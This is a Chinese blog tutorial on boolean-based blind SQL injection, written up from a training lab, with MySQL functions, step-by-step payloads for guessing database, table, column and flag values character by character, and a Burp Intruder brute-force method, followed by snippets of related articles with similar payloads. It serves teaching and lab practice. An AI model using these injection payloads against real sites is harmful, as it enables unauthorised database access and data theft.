布尔盲注--zkaq

最新推荐文章于 2023-10-22 00:19:23 发布
最新推荐文章于 2023-10-22 00:19:23 发布
阅读量156 收藏
点赞数
文章标签: 数据库 oracle sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74410605/article/details/131747086
版权

目录

一.什么是布尔盲注

二.常用函数

三.具体步骤

四.实例分析

一.什么是布尔盲注

根据你注入的信息返回true和false,没有具体内容显示。

二.常用函数

length()  返回字符串的长度
substr()  截取字符串  substr(字符串,截取的开始,截取的长度)
ascii()  返回字符的ascii码
sleep()  延时 
if(expr1,expr2,expr3)  判断语句:如果第一个语句正确就执行第二个语句,否则执行第三个

三.具体步骤

  • 猜解当前数据库名称的长度

          and (length(database()))>9#

  • 利用ASCII码猜解当前数据库名称

        and substr(database(),1,1)='s'或者
        and ascii(substr(database(),1,1))=115--+返回正常,说明数据库名称第一位是s

        and (ascii(substr(databse(),2,1)))=101--+返回正常,说明数据库名称第二位是e

  • 猜表名

        and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101--+返回正常,说明数据库的第一个的第一位是e

  • 猜字段

        and (ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='yay' limit 0,1),1,1)))=101--+返回正常,说明yay表里的列名称第一位是f

  • 猜内容

        and (ascii(substr((select flag from yay limit 1,1),1,1)))=122--+

四.实例分析

输入and 1=1和1=2发现只会告诉是否有数据,但不会显示数据内容,所以判断是布尔盲注。

 

 如下图,表长为12

 

 如下图,库名第一个字母是k(107是ASCII值所对应就是k)

或者用burp逐个爆破更加方便。先抓包,然后发送至intruder,先清除变量符号,然后将ascii值添加上变量符号。

找到长度相较于其他过长或过短的字符,如下图119(w)就是第四个字符。

 

 接着可以用和猜库名一样的方法,逐个尝试猜解表名、字段名以及相关内容,或者也可以用bp逐个爆破。

 

 耐心地按照具体步骤依次查找,就可以查询到flag

 

咕噜yay
关注
SQL盲注篇之布尔盲注
weixin_47785246的博客
07-11 3047
简单介绍SQL注入中的盲注,通过靶场的练习,演示SQL盲注的一些常用方法与思路。
布尔盲注练习
weixin_60777183的博客
08-27 270
盲注需要掌握的几个函数: 1.length() 判断字符串的长度 举例:and length(database())>1 2.substr() 截取字符串的函数 格式:substr(str,pos,len) substr(字符串内容,从哪里切,切多长) 可用于:and substr(database(),1,1)=’a’ 来判断数据库的第一位是否为a 3.ascii() 返回字符的asc码 加入ascii码判断,可改为: ?id=1 and ascii(substr(database(),
布尔盲注知识点
m0_75178803的博客
10-22 476
概念:布尔盲注一般适用于页面没有回显字段(不支持联合查询),且web页面返回True 或者 false,构造SQL语句,利用and,or等关键字来其后的语句truefalse使web页面返回true或者false,从而达到注入的目的来获取信息ascii() 函数,返回字符ascii码值参数 : str单字符length() 函数,返回字符串的长度参数 : str 字符串left() 函数,返回从左至右截取固定长度的字符串参数str,lengthstr : 字符串length:截取长度。
SQL注入进阶:掌握布尔盲注和延时注入攻击技巧
weixin_43263566的博客
01-21 4521
SQL注入篇 - 布尔盲注及延时注入
布尔盲注(一)
qq_45300786的博客
07-11 2353
盲注介绍: 注入攻击的本质,是把用户输入的数据当成代码执行。 这里有2个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据。 盲注所对应的是显错注入,显错注入我们之前讲过,但是很多时候, web服务器关闭了错误回显,这时候就没有办法实行SQL注入了吗? 2.常用函数 length()长度函数 substr()截取字符串 ascii()返回字符的ascii码 sleep()延迟函数 if(expr1,expr2,expr3)判断函数,有点类似于三元运算 3、
布尔盲注
m0_56107268的博客
12-04 809
布尔盲注常用函数 length() 返回字符串的长度 substr() 截取字符串 substr(a,b,c) 第一个是截取的字符串 ,第二个是截取的位置 ,第三个是截取的长度 ascii() 返回字符串的ASCII码 limit a,b 第一个字符代表查询内容的位置,第二个代表长度 布尔盲注原理: 通过网页的回显来判断读错,可以利用and < > = 来进行判断 sql语句: SELECT * FROM users WHERE id='$id' LIMIT 0,1 爆数据库 (...
[zkaq靶场]SQL注入--布尔盲注
wwxxee
05-08 200
布尔盲注 常用函数 length() 返回字符串长度 substring() substr() mid() 截取字符串: 参数1:字符串 参数2:起始位置,索引从1开始 参数3:截取长度 concat() 不带分隔符链接字符串 concat_ws() 带分隔符链接字符串: concat_ws(’-’,‘a’,‘b’,‘c’) group_concat() 链接一组查询结果字符串 ord() ascii() 返回字符串的ASCII值 left() 从左边开始截取字符串: 参数1:字符串 参数2:截取的长度 l
sql注入之布尔盲注
笔墨稠思
11-13 175
什么是盲注? 所谓盲注,就是在服务器没有错误回显的时候完成注入攻击 什么是布尔盲注? 布尔,这个词很明显,他会根据我们输入的注入信息,返回True和False,没有其他的任何报错信息 实现布尔盲注需要利用一下几个函数 length() 返回字符串长度 substr() 截取字符串 ascii() 返回字符的ascii码 靶场实战: 我们发现这个靶场为get传参,参数为id = 1 首先我们判断是否存在注入 我们把传参改为id = 2 - 1 发现数据返
封神台SQL注入-盲注
qq_40941912的博客
10-05 797
一、原理 所谓的盲注就是在服务器没有错误回显的时候完成的注入攻击。 服务器没有错误回显,对于攻击者来说缺少了非常重要的“调试信息”。 布尔盲注 => 通过GET/_GET/G​ET/_POST传参获取后台数据库内容,并且可以通过URL栏/登录框进行SQL代码注入的 length() => 返回(字符串)长度的数值 substr([],[A],[B]) => 返回[]值中,[A]开始[B]位后的字符值 ascii() => 通过数值返回(此处内容)的阿斯克码 二、作业 (一) SQ
SQL注入-无回显】布尔盲注:原理、函数、利用过程
06-14 7843
SQL注入-无回显】
Sql注入截取字符串常用函数
weixin_34380296的博客
05-18 281
sql注入中,往往会用到截取字符串的问题,例如不回显的情况下进行的注入,也成为盲注,这种情况下往往需要一个一个字符的去猜解,过程中需要用到截取字符串。本文中主要列举三个函数和该函数注入过程中的一些用例。Ps;此处用mysql进行说明,其他类型数据库请自行检测。 三大法宝:mid(),substr(),left() mid()函数函数为截取字符串一部分。MID(co...
盲注学习(sqli-labs 8(布尔盲注) 9(时间盲注))
欢迎光临
06-06 1567
所以称为盲注是因为他不会根据你sql注入的攻击语句返回你想要知道的错误信息。盲注分为两类:    1.布尔盲注 布尔很明显Ture跟Fales,也就是说它只会根据    你的注入信息返回Ture跟Fales,也就没有了之前的报错信息。    2.时间盲注 界面返回值只有一种,true 无论输入任何值 返回情况都会按正常的来处理。加入特定的时间函数,通过查看web页面返回的时间差来判断注入的语句是否...
SQL盲注注入——布尔
热门推荐
weixin_40709439的博客
08-03 4万+
盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。本次主要讲解的是基于布尔盲注。 Length()函数 返回字符串的长度 Substr()截取字符串 Ascii()返回字符的ascii码 sleep(n):将程序挂起一段时间 n为n秒 if(expr1,expr2,expr3):判断语句 如果第一个语...
SQL布尔盲注常用语句
孤的博客
08-23 2992
过程 1.判断是否存在注入,注入字符型还是数字型 2.猜解当前数据库数据库长度→库名 3.数据库中的表名 几个表→长度→名称 4.表中的字段名 字段个数→长度→名称 5.数据 判断 1’ and ‘1’=‘1 1’ and ‘1’='2 2.库名 1’ and length(database())>3# 1’ and length(database())=5 # 1’ and mid...
MySQL基于布尔盲注常用语句
专注企业信息安全-sec
10-04 2441
什么是盲注? 基于布尔SQL盲注即在SQL注入过程中,应用程序仅仅返回True(页面)和False(页面)。 这时,我们无法根据应用程序的返回页面得到我们需要的数据库信息。但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息。 常用语句汇总 查询所有数据库 1.判断表存不存在   1   and exists(select ...
⑥基于布尔SQL盲注
熊俊坤的博客
10-28 5026
基于布尔SQL盲注
bool盲注中用到的截取字符串的函数(mid、substr、left)
weixin_30917213的博客
02-09 476
介绍一下常用的:mid、substr、left 1、mid()函数函数为截取字符串一部分。MID(column_name,start[,length]) 参数 描述 column_name 必需。要提取字符的字段。 start 必需。规定开始...
什么是布尔盲注?学到了
m0re's blog
03-08 2702
周一晚上学长给我们讲了布尔盲注和时间盲注布尔盲注 布尔盲注为什么叫布尔盲注,看下概念 盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。 基于布尔盲注 Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。 明白了,True和False都是布尔类型,...
布尔盲注 python
最新发布
12-22
布尔盲注是一种常见的网络安全攻击技术,利用用户输入的漏洞来修改数据库查询,从而实现非法访问或者窃取敏感信息。而 Python 是一种强大的编程语言,广泛应用于网络开发领域。 在 Python 中,由于开发者处理用户...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值